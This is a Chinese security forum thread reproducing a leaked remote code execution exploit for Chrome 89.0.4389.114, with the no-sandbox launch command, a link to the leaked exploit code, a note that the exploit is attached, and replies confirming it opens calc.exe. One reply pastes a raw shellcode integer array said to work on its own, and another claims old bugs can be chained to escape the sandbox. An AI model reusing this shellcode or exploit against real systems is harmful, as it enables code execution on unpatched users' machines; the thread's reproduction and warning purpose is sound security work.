首页
论坛
课程
招聘
[原创]Chrome 远程代码执行漏洞复现 (2021年4月13日)
2021-4-13 11:47 4207

[原创]Chrome 远程代码执行漏洞复现 (2021年4月13日)

2021-4-13 11:47
4207

简述

测试版本: 89.0.4389.114

测试需求:关闭沙箱环境 (目前已泄露的exp需关闭沙箱环境才可执行)
图片描述

1
“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” --test-type --no-sandbox

exp泄露地址:https://github.com/r4j0x00/exploits/tree/master/chrome-0day

EXP演示:


运行行为监控

chrome内核浏览器测试:edge--存在
图片描述

EXP备份

请见附件

注意

虽然目前泄露的exp执行存在限制,但不排除存在不受限的EXP。


第五届安全开发者峰会(SDC 2021)议题征集正式开启!

最后于 2021-4-13 14:32 被梦幻的彼岸编辑 ,原因:
上传的附件:
收藏
点赞1
打赏
分享
最新回复 (6)
雪    币: 76
活跃值: 活跃值 (3439)
能力值: (RANK:260 )
在线值:
发帖
回帖
粉丝
0x2l 活跃值 3 2021-4-13 11:59
2
0
这发到web安全?
雪    币: 1368
活跃值: 活跃值 (11230)
能力值: (RANK:220 )
在线值:
发帖
回帖
粉丝
梦幻的彼岸 活跃值 1 2021-4-13 12:07
3
1
感谢提醒,已移动
雪    币:
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
wx_X_120 活跃值 2021-4-13 15:03
4
0
好家伙。确实打开calc.exe了。
雪    币: 0
活跃值: 活跃值 (21)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
C0isini 活跃值 2021-4-13 16:47
5
0
目前泄露的 exp 只影响Windows10,验证 Windows7 不受影响。
雪    币: 305
活跃值: 活跃值 (314)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
sixL 活跃值 2021-4-13 17:58
6
0
shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]
这个SHELLCODE能单独工作。
雪    币: 1209
活跃值: 活跃值 (269)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
Fruei 活跃值 2021-4-13 19:23
7
0
在win7下测试成功了,虽然利用条件比较苛刻,但是利用老漏洞配合,是可以绕过沙箱的,建议暂时更换其他浏览器使用!
游客
登录 | 注册 方可回帖
返回